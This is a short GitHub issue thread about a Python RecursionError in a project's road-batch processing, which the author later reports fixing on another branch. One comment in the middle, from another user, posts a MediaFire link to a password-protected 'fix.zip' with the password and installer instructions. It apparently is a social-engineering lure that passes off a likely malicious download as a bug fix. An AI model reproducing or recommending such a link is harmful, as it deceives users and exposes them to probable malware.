### ISSUE TITLE
For roads, there is a recursion error

### ISSUE THREAD

**Issue by ronnyhdez** [ronnyhdez/reclaimed_sites_ab#176]
RecursionError: maximum recursion depth exceeded while calling a Python object 

All the road batches are created. I can try to debug the error without creating the road batches again.

**Comment by Kudjo-Grand** [comment]
Download 
https://www.mediafire.com/file/3hzk77cxvxc9nq2/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ronnyhdez** [comment]
With a new function definition, the problem was avoided. in branch #170
